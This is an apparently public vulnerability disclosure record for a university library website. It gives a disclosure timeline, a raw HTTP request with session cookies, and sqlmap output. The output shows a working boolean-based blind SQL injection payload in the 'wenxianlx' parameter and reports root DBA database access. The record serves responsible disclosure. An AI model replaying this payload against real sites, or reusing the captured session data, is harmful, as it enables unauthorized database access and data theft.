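2015-11-23: Details reported to the vendor; awaiting vendor handling
2015-11-23: Vendor confirmed; details disclosed to the vendor only
2015-12-03: Details disclosed to core white hats and experts in related fields
2015-12-13: Details disclosed to regular white hats
2015-12-23: Details disclosed to intern white hats
2016-01-11: Details disclosed to the public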
RT
GET /plus/list.php?page=2&tid=69&wenxianlx= HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://library.upc.edu.cn
Cookie: safedog-flow-item=FBBE77FDEBD8B0A43B868DAFC74C71D0; PHPSESSID=aqgq2glp7u4h00887f7c9rc387; %D6%D0%B9%FA%CA%AF%D3%CD%B4%F3%D1%A7%B9%AB%CE%C4%C7%A9%CA%D5%CF%B5%CD%B3=ViewUrl=admin%5Findex%2Easp&shenhe=&reglevel=&fullname=&KEY=&purview=&UserName=; ASPSESSIONIDQCCTASBD=AALJIFDCNMGNKDDFNLHFJGAJ; OrdersId=AFBXL1UBVjFQM1RvAjsFb1VjVW0JYlFlVGtXUQ0VAD1VYAJm; CNZZDATA1000490494=983320778-1447851033-http%253A%252F%252Fwww.acunetix-referrer.com%252F%7C1447851033; safedog-flow-item=FBBE77FDEBD8B0A43B868DAFC74C71D0
Host: library.upc.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
The wenxianlx parameter is vulnerable to injection.
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: wenxianlx (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: page=2&tid=69&wenxianlx=-5746') OR 8493=8493 AND ('TVbi' LIKE 'TVbi
---
back-end DBMS: MySQL 5
available databases [1]:
[*] sydxtsg

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: wenxianlx (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: page=2&tid=69&wenxianlx=-5746') OR 8493=8493 AND ('TVbi' LIKE 'TVbi
---
back-end DBMS: MySQL 5
current user: 'root@localhost'
current user is DBA: True
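Severity: Medium
Vulnerability Rank: 8
Confirmed: 2015-11-23 13:37
Thank you for your attention to the school's network security. We will resolve this issue as soon as possible.
None yet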